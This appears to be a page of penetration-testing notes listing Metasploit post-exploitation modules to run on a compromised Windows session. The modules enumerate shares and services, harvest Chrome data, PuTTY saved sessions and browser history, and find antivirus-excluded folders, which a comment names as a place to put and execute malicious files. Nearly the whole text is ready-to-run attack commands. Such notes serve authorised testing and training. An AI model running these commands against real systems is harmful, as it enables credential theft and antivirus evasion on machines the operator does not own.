Enumeration 3 - Shares, SMB, and More

#enumerate the shares
use post/windows/gather/enum_shares
options
set session 2
run

#detect all the services that are running
use post/windows/gather/enum_services
options
set session 2
run

use post/windows/gather/enum_snmp
options
set session 2
run

use post/windows/gather/enum_chrome
options
set session 2
run

#a folder that the AV has excluded so we can put malicious files and execute from there
use post/windows/gather/enum_av_excluded
options
set session 2
run

#putty saved sessions
use post/windows/gather/enum_putty_saved_sessions
options
set session 2
run

#installed applications
use post/windows/gather/enum_applications
options
set session 2
run

use post/windows/gather/forensics/browser_history
info
options
set session 2
run

#look for more forensics modules
search post/windows/gather/forensics/

Last updated